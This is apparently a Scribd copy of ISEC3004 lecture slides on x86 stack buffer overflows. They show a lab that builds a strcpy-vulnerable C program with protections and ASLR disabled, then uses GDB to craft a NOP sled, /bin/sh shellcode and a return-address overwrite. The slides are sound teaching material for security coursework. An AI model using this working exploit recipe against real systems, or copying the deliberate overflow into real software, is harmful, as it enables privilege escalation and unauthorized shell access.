[go: up one dir, main page]
Scribd
Upload
17 views20 pages

32BO

The document outlines the prerequisites and steps for conducting a buffer overflow attack using a vulnerable C program. It details the setup of a Kali Linux environment, the identification of unsafe C functions, and the use of GDB for debugging and executing the attack. Additionally, it provides references for further reading on shellcode and buffer overflow techniques.

Uploaded by

aado5488
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
17 views20 pages

32BO

The document outlines the prerequisites and steps for conducting a buffer overflow attack using a vulnerable C program. It details the setup of a Kali Linux environment, the identification of unsafe C functions, and the use of GDB for debugging and executing the attack. Additionally, it provides references for further reading on shellcode and buffer overflow techniques.

Uploaded by

aado5488
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 20

X86 - BO

Buffer Overflow Attack Anatomy

ISEC3004 2
Prerequisites for Buffer Overflow Attack
• CPU internals
• Assembly Language
Accessible via GDB
• Process Memory Layout
• Stack
• Shellcode

What C functions are vulnerable to buffer overflow?


→ printf , sprintf , strcat , strcpy , and gets

ISEC3004 3
System setup
• Download Kali-Linux from https://bit.ly/3wA9J66
• Double click kali-linux-2022.3-virtualbox-i386.vdi
• Username: kali
Password: kali
• sudo nano /etc/apt/sources.list
comment out the following line (using #)
deb http://http.kali.org/kali kali-rolling main contrib non-free
add the following line
deb http://mirror.fsmg.org.nz/kali kali-rolling main contrib non-free
ISEC3004 4
A vulnerable C program
#include <string.h>
sudo nano vul.c
#include <stdio.h>
void main(int argc, char
*argv[]) {
gcc –g m32 -z execstack -fno-stack-protector -no-pie -o vul copier(argv[1]);
vul.c
printf("Done!\n");}
int copier(char *str) {
./vul A
char buffer[128];
strcpy(buffer, str);
}

ISEC3004 5
Configure GDB
• sudo apt update

• sudo apt install build-essential gdb

• sudo sysctl -w kernel.randomize_va_space=0

• sudo sh -c "echo 0 > /proc/sys/kernel/randomize_va_space"

• echo "set disassembly-flavor intel" > ~/.gdbinit


ISEC3004 6
Let’s attack vul using GDB . . .

• gdb -q vul

• disassemble main [Check for unsafe C functions]

No unsafe function is found… but there is a custom function “copier”

• disassemble copier [Check for unsafe C functions]

Unsafe function “strcpy” is found

ISEC3004 7
Let’s attack vul using GDB . . .
It is always good to set the GDB break after the unsafe function.

• break *copier+43

• run $(python2 -c 'print "A"*50')

ISEC3004 8
Let’s attack vul using GDB . . .
See the memory stack.
• info register
• x $ebp
• x/50x $esp

ISEC3004 9
Let’s attack vul using GDB . . .
How many A’s are needed to fill up to $ebp

• Get the memory address where the Buffer has started.


For my case, it is: 0xbffff0f8

• print ((long) $ebp – (long) $esp)

ISEC3004 10
Let’s attack vul using GDB . . .
On the previous terminal.
• run $(python2 -c 'print "A"*136')
• info registers
• x $ebp
• x/50x $esp

ISEC3004 11
Let’s attack vul using GDB . . .
On the previous terminal.
• run $(python2 -c 'print "A"*136 + "1234"')
• info registers
• x $ebp
• x/50x $esp

ISEC3004 12
Let’s see the power of Shellcode
#include <stdio.h>
https://www.exploit-db.com/shellcodes/47008
#include <string.h>
int main(){
• sudo nano shell.c unsigned char code[]= \
"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd
2"
• gcc shell.c -fno-stack-protector -z execstack -o shell "\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62
\x69\x89"
"\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x8
• ./shell 0";
printf("length of your shellcode is: %d\n",
(int)strlen(code));
int foo_value = 0;
int (*foo)() = (int(*)())code;
foo();
}

ISEC3004 13
Let’s attack vul using GDB . . .
On the previous terminal.
• run $(python2 -c 'print
"A"*88+"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x7
3\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x
80"+"A"*16+"1234"')
• x/50x $esp

ISEC3004 14
Let’s attack vul using GDB . . .
On the previous terminal.
• run $(python2 -c 'print
"\x90"*88+"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f
\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xc
d\x80"+"A"*16+"1234"')
• x/50x $esp

ISEC3004 15
Let’s attack vul using GDB . . .

ISEC3004 16
Let’s attack vul using GDB . . .
On the previous terminal.
• run $(python2 -c 'print
"\x90"*88+"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f
\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xc
d\x80"+"A"*16+"\x40\xf0\xff\xbf"')
• x/50x $esp

ISEC3004 17
Let’s attack vul using GDB . . .
On the previous terminal.
• continue

ISEC3004 18
References
• https://shell-storm.org/shellcode/
• https://www.exploit-db.com/shellcodes

• https://www.exploit-db.com/docs/english/28475-linux-stack-based-buffer-overflows.pdf
• https://web.ecs.syr.edu/~wedu/seed/Book/book_sample_buffer.pdf
• https://cseweb.ucsd.edu/~dstefan/cse127-fall20/notes/bufferoverflow.html
• https://www.usna.edu/ECE/ec312/Lessons/host/EC312_Lesson_9_Buffer_Overflow_Attack_Cour
se_Notes.pdf
• https://cdn.ttgtmedia.com/searchSecurity/downloads/ExploitingSoftware-Ch07.pdf

ISEC3004 19
Thank You

ISEC3004 20

You might also like